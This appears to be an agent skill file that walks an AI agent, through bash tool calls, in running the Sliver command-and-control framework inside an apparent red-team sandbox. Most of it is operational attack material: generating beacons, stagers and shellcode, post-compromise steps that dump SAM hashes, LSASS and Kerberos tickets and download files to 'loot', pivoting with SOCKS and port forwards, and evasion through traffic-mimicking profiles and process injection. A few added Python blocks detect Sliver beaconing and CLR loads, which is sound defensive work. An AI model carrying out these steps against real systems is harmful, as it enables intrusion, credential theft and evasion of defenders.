c2-sliver

Sliver C2 framework operations — server connection, listener setup, implant generation, BOF/Armory extensions, post-implant operations, HTTP C2 profiles.

By dazeb. Updated 4/28/2026

name: c2-sliver
description: "Sliver C2 framework operations — server connection, listener setup, implant generation, BOF/Armory extensions, post-implant operations, HTTP C2 profiles."
allowed-tools: Bash Read
metadata:
  subdomain: command-and-control
  when_to_use: "Sliver, sliver-client, sliver listener, sliver implant, sliver beacon, armory, BOF"
  tags: c2, sliver, implant, beacon, listener, bof, armory, pivot
  mitre_attack: T1071, T1573, T1090, T1105, T1572

Sliver C2 Framework

Sliver is an open-source, cross-platform adversary emulation framework by Bishop Fox. It supports beacon (asynchronous) and session (interactive) implants over mTLS, HTTPS, DNS, and WireGuard channels, with multi-operator support.

Decepticon Setup

  • Server: c2-sliver container on sandbox-net (daemon mode, gRPC on port 31337)
  • Client: sliver-client pre-installed in sandbox
  • Config: Auto-generated operator config at /workspace/.sliver-configs/botron.cfg

Connection Procedure (via bash tool)

# 1. Verify C2 reachable
bash(command="nc -z c2-sliver 31337 && echo 'C2_OK' || echo 'C2_DOWN'")

# 2. Import operator config (once — skip if already imported)
bash(command="ls ~/.sliver-client/configs/ 2>/dev/null | grep -q . || sliver-client import /workspace/.sliver-configs/botron.cfg")

# 3. Start interactive console in dedicated tmux session
bash(command="sliver-client console", session="c2")

# 4. Run Sliver commands interactively
bash(command="https --lhost 0.0.0.0 --lport 443 --domain c2-sliver", is_input=True, session="c2")
bash(command="sessions", is_input=True, session="c2")

IMPORTANT:

  • Do NOT generate operator configs manually — use the pre-generated one at /workspace/.sliver-configs/botron.cfg
  • Do NOT start sliver-server in sandbox — the server runs in its own container
  • sliver-client console is interactive — MUST use a dedicated session (e.g. session="c2") and send subsequent commands with is_input=True
  • If "multiple configs found": bash(command="sliver-client console --config ~/.sliver-client/configs/decepticon_c2-sliver.cfg", session="c2")

1. Listener Configuration

All commands below run inside the Sliver console (session="c2", is_input=True).

HTTPS Listener

# Basic HTTPS listener on 443
https --lhost 0.0.0.0 --lport 443 --domain c2-sliver

# HTTPS with custom certificate (better OPSEC)
https --lhost 0.0.0.0 --lport 443 --domain c2-sliver \
    --cert /workspace/certs/cert.pem \
    --key /workspace/certs/key.pem

# HTTPS with Let's Encrypt (requires DNS control)
https --lhost 0.0.0.0 --lport 443 --domain c2-sliver --lets-encrypt

DNS Listener

# DNS listener — requires NS record pointing to C2 server
dns --domains c2.<TARGET> --lport 53

# Verify DNS resolution
dig @c2-sliver test.c2.<TARGET> TXT +short

mTLS Listener

# mTLS — encrypted, mutual authentication (recommended for internal pivoting)
mtls --lhost 0.0.0.0 --lport 8888

# mTLS on non-standard port
mtls --lhost 0.0.0.0 --lport 8443

WireGuard Listener

# WireGuard tunnel — full network access through implant
wg --lhost 0.0.0.0 --lport 51820

2. Implant Generation

CRITICAL — Compilation Timeout: Sliver's generate command compiles a Go binary from source. This takes 2-10 minutes depending on options. The spinner animation (⠴ Compiling, please wait ...) keeps the screen active, so stall detection will NOT trigger early.

Rules:

  1. ALWAYS use --skip-symbols — reduces compilation time from ~5 min to ~30 sec
  2. ALWAYS use --save <path> — saves implant directly to the target directory. Do NOT rely on the default save location and then cp — file copy may fail on bind-mounted volumes (WSL2/NTFS "Invalid argument" error).
  3. Use a longer timeout for generate commands: bash(command="generate ...", is_input=True, session="c2", timeout=300)

Example (correct):

bash(command="generate --os linux --arch amd64 --mtls c2-sliver:8888 --skip-symbols --save /workspace/exploit/", is_input=True, session="c2", timeout=300)

Beacon (Async)

# Windows beacon via mTLS with jitter
generate beacon --mtls c2-sliver:8888 --os windows --arch amd64 \
    --seconds 30 --jitter 50 --skip-symbols \
    --name win_beacon \
    --save /workspace/exploit/

# Windows beacon via HTTPS
generate beacon --https c2-sliver:443 --os windows --arch amd64 \
    --seconds 60 --jitter 30 --skip-symbols \
    --save /workspace/exploit/

# Linux beacon via DNS (low-and-slow)
generate beacon --dns c2-sliver --os linux --arch amd64 \
    --seconds 120 --jitter 70 --skip-symbols \
    --name lin_dns \
    --save /workspace/exploit/
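
Seen from the detection side, the `--seconds`/`--jitter` pairs above still leave check-ins spaced inside a bounded band. The following is an added example, not part of the original skill or of Sliver: it scores inter-arrival gaps per source/destination pair over constructed flow records. The record layout, the thresholds, and the assumption that jitter adds a random delay on top of the base interval are this example's own.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed flow records: (epoch_seconds, src_ip, dst_ip, dst_port).
# 10.0.0.5 checks in every 30 s plus 0-15 s of added delay; 10.0.0.9 is a user browsing.
FLOWS = [(t, "10.0.0.5", "203.0.113.10", 8888)
         for t in (0, 34, 71, 103, 146, 180, 222, 259, 291, 330)]
FLOWS += [(t, "10.0.0.9", "198.51.100.7", 443)
          for t in (5, 6, 8, 140, 141, 900, 905, 2400, 2401, 2410)]


def beacon_candidates(flows, min_events=8, max_cv=0.35, max_spread=2.0):
    """Return {(src, dst, port): stats} for pairs whose gaps look timer-driven.

    cv     = stdev/mean of inter-arrival gaps (low for a sleep loop, even with jitter)
    spread = max_gap/min_gap (bounded when delay = base + random(0..jitter))
    """
    by_pair = defaultdict(list)
    for ts, src, dst, port in flows:
        by_pair[(src, dst, port)].append(ts)

    hits = {}
    for pair, times in by_pair.items():
        if len(times) < min_events:
            continue  # too few samples to judge periodicity
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        if min(gaps) <= 0:
            continue  # simultaneous connections: bursty client, not a sleep loop
        cv = pstdev(gaps) / mean(gaps)
        spread = max(gaps) / min(gaps)
        if cv <= max_cv and spread <= max_spread:
            hits[pair] = {"events": len(times), "mean_gap": round(mean(gaps), 1),
                          "cv": round(cv, 3), "spread": round(spread, 2)}
    return hits


if __name__ == "__main__":
    for pair, stats in beacon_candidates(FLOWS).items():
        print(pair, stats)
```

Longer intervals need a longer observation window before `min_events` is reached, so the window should be sized to the slowest interval worth catching.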

Session (Interactive)

# Windows session — persistent connection, immediate response
generate --mtls c2-sliver:8888 --os windows --arch amd64 \
    --skip-symbols --name win_session \
    --save /workspace/exploit/

# Linux session via HTTPS
generate --https c2-sliver:443 --os linux --arch amd64 \
    --skip-symbols --name lin_https \
    --save /workspace/exploit/

Stager (Small Initial Payload)

# TCP stager — downloads full implant after initial execution
generate stager --lhost c2-sliver --lport 8443 --protocol tcp \
    --os windows --arch amd64 \
    --save /workspace/exploit/stager.bin

Shellcode (For Custom Loaders)

# Raw shellcode for process injection / custom droppers
generate --mtls c2-sliver:8888 --os windows --arch amd64 \
    --format shellcode --skip-symbols \
    --save /workspace/exploit/shellcode.bin

Output Formats

| Format | Flag | Use Case |
|---|---|---|
| EXE | --format exe | Direct execution |
| Shared library | --format shared | DLL sideloading |
| Shellcode | --format shellcode | Injection, custom loaders |
| Service | --format service | Windows service persistence |

OPSEC: Implant Hardening

# Skip debug symbols (smaller, harder to reverse, MUCH faster compile)
generate --mtls c2-sliver:8888 --os windows --skip-symbols

# Limit implant size
generate --mtls c2-sliver:8888 --os windows --format shellcode --skip-symbols

3. Session & Beacon Management

# List active sessions / beacons
sessions
beacons

# Interact with session
use <SESSION_ID>

# Interact with beacon
use <BEACON_ID>

# Background current session
background

# Kill session
sessions -k <SESSION_ID>

# Rename implant
rename -n <NEW_NAME>

4. Post-Implant Operations

Host Reconnaissance

# After `use <SESSION_ID>`
whoami                         # Current user
getuid                         # User ID
getgid                         # Group ID
getprivs                       # Token privileges
info                           # Full implant info

# System enumeration
shell systeminfo
shell ipconfig /all
shell net user
shell net localgroup administrators
shell tasklist /v

# Environment
env
pwd
ls

File Operations

# Download from target
download C:\\Users\\<USER>\\Documents\\sensitive.docx /workspace/post-exploit/loot/

# Upload tool to target
upload /workspace/exploit/implants/SharpHound.exe C:\\Windows\\Temp\\

# List directory
ls C:\\Users\\<USER>\\Desktop\\

Process Operations

# List processes
ps

# Process injection (migrate to another process for stealth)
migrate <PID>

# Execute .NET assembly in memory (no disk touch)
execute-assembly /workspace/tools/Seatbelt.exe -group=all

# Sideload DLL (reflective loading)
sideload /workspace/tools/mimikatz.dll

# Screenshot
screenshot

# Spawn new process
shell notepad.exe

Credential Operations

# Dump SAM hashes (requires SYSTEM/admin)
hashdump

# Kerberos ticket extraction
execute-assembly /workspace/tools/Rubeus.exe dump

# DPAPI credential access
execute-assembly /workspace/tools/SharpDPAPI.exe triage

# Comprehensive host audit
execute-assembly /workspace/tools/Seatbelt.exe -group=all

5. BOF / Armory (In-Memory Extensions)

Beacon Object Files (BOFs) execute position-independent C code in the implant process — no new process creation, no disk writes.

Armory (Package Manager)

# List available extensions
armory

# Install extension from armory
armory install sa-ldapsearch
armory install nanodump
armory install credman
armory install situational-awareness

# Update all installed extensions
armory update

BOF Execution

# LDAP enumeration (no LDAP tool needed on target)
sa-ldapsearch -- "(objectClass=user)"
sa-ldapsearch -- "(objectClass=computer)"

# Process dump with nanodump (LSASS without Mimikatz)
nanodump -w C:\\Windows\\Temp\\debug.dmp

# Credential manager access
credman

# Situational awareness (whoami, env, network)
situational-awareness

Why BOFs Over execute-assembly

| Feature | BOF | execute-assembly |
|---|---|---|
| Process creation | None (runs in implant) | Fork & run (new process) |
| Disk artifacts | None | .NET assembly loaded |
| EDR visibility | Low (in-process) | Medium (CLR load event) |
| Size | Small (KBs) | Larger (full .NET binary) |
| Flexibility | C only | Any .NET assembly |
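
The "CLR load event" in the comparison above is something defenders can query directly. The following is an added example, not part of the original skill or of Sliver: it filters Sysmon Event ID 7 (image load) records for the .NET runtime loading into a process that is not expected to host managed code. The event dicts and the allowlist are constructed for illustration.

```python
import ntpath

# DLLs whose load marks CLR start-up inside a process.
CLR_MODULES = {"clr.dll", "clrjit.dll", "mscoree.dll", "coreclr.dll"}

# Hypothetical allowlist: processes expected to host .NET in this environment.
EXPECTED_DOTNET_HOSTS = {"powershell.exe", "msbuild.exe", "w3wp.exe"}

# Constructed Sysmon Event ID 7 records (only the fields used here).
EVENTS = [
    {"EventID": 7, "ProcessId": 4120, "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"},
    {"EventID": 7, "ProcessId": 4120, "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll"},
    {"EventID": 7, "ProcessId": 4120, "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
    {"EventID": 7, "ProcessId": 900,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ImageLoaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CLR.DLL"},
    {"EventID": 1, "ProcessId": 4120, "Image": r"C:\Windows\System32\notepad.exe"},
]


def unexpected_clr_loads(events, expected=EXPECTED_DOTNET_HOSTS):
    """Group CLR module loads by process and keep processes not on the allowlist."""
    hits = {}
    for ev in events:
        if ev.get("EventID") != 7:
            continue  # only image-load events are relevant
        # ntpath handles Windows paths on any analysis host; compare case-insensitively.
        module = ntpath.basename(ev.get("ImageLoaded", "")).lower()
        host = ntpath.basename(ev.get("Image", "")).lower()
        if module not in CLR_MODULES or host in expected:
            continue
        hits.setdefault((ev.get("ProcessId"), host), set()).add(module)
    return [{"pid": pid, "process": host, "clr_modules": sorted(mods)}
            for (pid, host), mods in sorted(hits.items())]


if __name__ == "__main__":
    for hit in unexpected_clr_loads(EVENTS):
        print(hit)
```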

6. Network & Pivot Operations

SOCKS5 Proxy

# Route traffic through implant into target network
socks5 start -p 1080

# Use from sandbox with proxychains:
#   proxychains nmap -sT -Pn <INTERNAL_HOST>

Port Forwarding

# Forward local port to remote service through implant
portfwd add -b 127.0.0.1:9090 -r <INTERNAL_HOST>:445

# List active port forwards
portfwd

# Remove forward
portfwd rm -i <ID>

Reverse Port Forwarding

# Expose sandbox service to target network via implant
rportfwd add -b <INTERNAL_HOST>:8080 -r 127.0.0.1:8080

Pivot Listener

# Create pivot listener on compromised host — new implants connect through it
pivots tcp --bind 0.0.0.0:9898

# Generate implant that connects via pivot
generate --tcp-pivot <PIVOT_HOST>:9898 --os windows

WireGuard Pivot

# WireGuard port forward for full tunnel
wg-portfwd add --remote <INTERNAL_HOST>:3389 --bind 127.0.0.1:3389

7. HTTP C2 Profile

Custom profiles shape C2 traffic to mimic legitimate application traffic.

{
    "implant_config": {
        "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "url_parameters": [
            { "name": "session", "value": "{{.GUID}}", "probability": 100 }
        ],
        "headers": [
            { "name": "Accept", "value": "text/html,application/xhtml+xml", "probability": 100 },
            { "name": "Accept-Language", "value": "en-US,en;q=0.9", "probability": 100 }
        ]
    },
    "server_config": {
        "headers": [
            { "name": "Content-Type", "value": "text/html; charset=utf-8", "probability": 100 },
            { "name": "Server", "value": "Microsoft-IIS/10.0", "probability": 100 },
            { "name": "X-Powered-By", "value": "ASP.NET", "probability": 100 }
        ]
    }
}

Save to profiles/sliver_https.json and apply it when starting the HTTPS listener.

8. Detection Signatures (Sliver-Specific)

| Indicator | Pattern | Mitigation |
|---|---|---|
| Default HTTP headers | Server: Apache/2.4.x + unique header combo | Use custom HTTP C2 profile |
| Default URI patterns | /login.php, /admin/login, /index.php | Custom URI paths |
| mTLS on non-standard ports | Outbound to unusual port (8888) | Use 443/8443 |
| DNS TXT encoding | Base64 TXT > 255 bytes | Fragment, short polling |
| Implant file hashes | Known Sliver samples in VirusTotal | --skip-symbols, custom loaders |
| JA3/JA3S fingerprints | TLS patterns unique to Sliver | Process injection into browser |
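
The "Pattern" column above, read as detection logic. This is an added example, not part of the original skill: it tags constructed proxy, flow and DNS records with the indicator they match and groups the results per source host. The record schema and the expected-port list are assumptions of this example.

```python
import base64
import binascii

DEFAULT_URIS = {"/login.php", "/admin/login", "/index.php"}  # from the table
EXPECTED_TLS_PORTS = {443, 8443}                             # assumed egress policy

# Constructed records, one dict per log line.
RECORDS = [
    {"type": "http", "src": "10.0.0.5", "uri": "/admin/login?session=abc", "server": "Apache/2.4.41"},
    {"type": "http", "src": "10.0.0.9", "uri": "/news/today", "server": "Apache/2.4.57"},
    {"type": "tls", "src": "10.0.0.5", "dst_port": 8888},
    {"type": "tls", "src": "10.0.0.9", "dst_port": 443},
    {"type": "dns", "src": "10.0.0.7", "qtype": "TXT",
     "answer": base64.b64encode(bytes(range(256))).decode()},
    {"type": "dns", "src": "10.0.0.9", "qtype": "TXT", "answer": "v=spf1 include:_spf.example.com ~all"},
]


def _is_base64(text):
    try:
        base64.b64decode(text, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False


def match_indicators(rec):
    """Return the table indicators (by name) that one record matches."""
    hits = []
    if rec["type"] == "http":
        if rec["uri"].split("?", 1)[0] in DEFAULT_URIS:
            hits.append("Default URI patterns")
            # Apache/2.4.x alone is too common; count it only alongside a default path.
            if rec.get("server", "").startswith("Apache/2.4."):
                hits.append("Default HTTP headers")
    elif rec["type"] == "tls" and rec["dst_port"] not in EXPECTED_TLS_PORTS:
        hits.append("mTLS on non-standard ports")
    elif rec["type"] == "dns" and rec["qtype"] == "TXT":
        if len(rec["answer"]) > 255 and _is_base64(rec["answer"]):
            hits.append("DNS TXT encoding")
    return hits


def score_hosts(records):
    """Collect distinct indicators per source host; several together merit triage."""
    per_host = {}
    for rec in records:
        for name in match_indicators(rec):
            per_host.setdefault(rec["src"], set()).add(name)
    return {src: sorted(names) for src, names in per_host.items()}
```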

9. Validation Criteria

  • sliver-client connects to c2-sliver server successfully
  • At least one listener active (HTTPS or mTLS)
  • Implant generated for target OS/architecture
  • Beacon callback confirmed with appropriate jitter
  • Session interaction works (whoami, ps, ls)
  • File upload/download operational
  • BOF execution validated (armory install + run)
  • Pivot infrastructure tested (SOCKS5 or port forward)
  • Backup C2 channel available (DNS fallback)
  • All C2 traffic encrypted

Bundled Resources

References

  • references/sliver-quickstart.md — Compact command reference for Sliver architecture, listeners, implant generation, post-implant ops, pivoting, and OPSEC.
Install via CLI
npx skills add https://github.com/dazeb/botron --skill c2-sliver